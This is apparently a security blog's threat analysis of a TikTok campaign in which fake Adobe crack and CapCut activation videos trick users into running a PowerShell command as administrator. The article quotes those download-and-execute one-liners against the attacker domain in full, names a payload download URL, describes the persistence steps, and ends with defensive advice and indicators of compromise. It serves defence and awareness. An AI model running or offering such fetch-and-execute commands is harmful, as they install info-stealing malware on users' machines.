Trend 'free software activation' on TikTok – a gateway for malware to enter your device
TikTok is known as a social media platform for sharing short videos, allowing users to create, edit, and share videos ranging from a few seconds to a few minutes, often with music, effects, and creative filters. As of 2025, the platform has attracted over 1.5 billion monthly active users across 150 countries and supports more than 75 languages.
Due to its continuous popularity, cybercriminal groups are exploiting TikTok's viral nature to post fake "tutorial" videos (often AI-generated or deepfake) that urge viewers to execute a command on their device (e.g., PowerShell) to install fake software (cracks, activations, or "free" apps). When users copy and run that command, it downloads and executes info-stealers or loaders like Vidar, StealC, Latrodectus—a variant of the “ClickFix” or “Click-to-fix” tactic. The concerning issue is that these scam videos often attract hundreds of thousands of views, posing a significant threat to information systems.
In this article, we will discuss a method of spreading malware through Windows PowerShell by instructing users to crack Adobe software, which is very popular in the market.
How Attackers Execute
As mentioned earlier, attackers continue to exploit two common attack techniques: “ClickFix” or “Click-to-fix” to initiate their campaigns. First, the attacker distributes videos instructing users to update CapCut or perform Crack Adobe via TikTok, attracting a significant number of viewers.
Both tutorial videos use the same trick by instructing users to open Windows PowerShell and run it as an Administrator. This not only executes commands quickly but also allows:
Editing the system registry.
Managing services, drivers, and processes of others.
Accessing system directories (
C:\Windows\System32,C:\Program Files, …).Installing software, modules, or changing policies (
Set-ExecutionPolicy,Install-Module, …).
After opening PowerShell and running it as Administrator, the attacker tricks the user into executing a command:
powershelliex (irmslmgr.win/photoshop)- Đối với những người dùng muốn Crack phần mềm Adobepowershelliex (irmslmgr.win/capcut)- Đối với những người dùng muốn Active phần mềm CapCut
After the user runs the above commands, it will download a script from https://slmgr.win/photoshop and execute it directly in memory. These scam campaigns on TikTok or YouTube have used this exact method to spread malware.
Then the malicious code will be downloaded in the next stage and is related to AuroStealer from the link: https://file-epq.pages.dev/updater.exe
After the malware is downloaded, it will execute a script to create a Scheduled Task to run powershell.exe with a command and code (stored in the $scr variable) each time the user logs in. Naturally, the task is named with one of the "legitimate/update-like" names (e.g., MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore, etc.) to disguise itself.
In summary, this script will execute the PowerShell payload ($scr) each time the user logs on. This is a common technique in malware.
Finally, another malicious payload will be executed with the name "source.exe".
A notable feature of this payload is that it will execute code in memory (in-memory execution), which helps avoid writing files to disk and can evade some file-based scanning tools. Additionally, it can run any payload: from stealers, loaders, RATs, to data theft, installing backdoors, or lateral movement.
Conclusion
This campaign has shown that cybercriminal groups are effectively using short video platforms like TikTok and YouTube to deploy in-memory malware, self-compiling through PowerShell. The attackers cleverly exploit TikTok's viral nature to trick users into running commands and scripts (social engineering).
It is effective because it combines strong social engineering with sophisticated techniques (persistence + in-memory execution), significantly reducing the chances of early detection if relying solely on traditional signature scanning. To counteract this, it's necessary to coordinate technical prevention (EDR, GPO, AppLocker), observation/monitoring (logging + SIEM), and human factors (training, awareness).
Recommendations
- For Users
Do not trust "free tips" or "software hacks."
Do not run commands requested from videos or external links (especially with admin rights).
Keep software updated: The operating system, security software, social media browsers, and applications you use should all be updated to minimize the risk of exploitation from new malware.
- Recommendations for Organizations and IT Administrators
Implement user education and training: Organizations should have a "phishing awareness" program (phishing, malvertising, social engineering) that includes campaigns like this - using social media videos to lure users into running malware.
Restrict the ability to run untrusted code in PowerShell: Use Group Policy to block or control downloading and running scripts from the internet, especially with administrative rights.
Use EDR/NGAV solutions capable of detecting "self-compiling" behavior or shellcode injection into memory: The article notes the use of
csc.exein stage 2 for compiling code and injecting shellcode.Software download policy: Allow users to download software only from internal sources or approved software repositories, not from social media links or unknown domains.
IOC
Link Tiktok
hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/
hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/
hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/
Domain
slmgr[.]win/photoshop
slmgr[.]win/capcut
Hash File
6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23
db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8
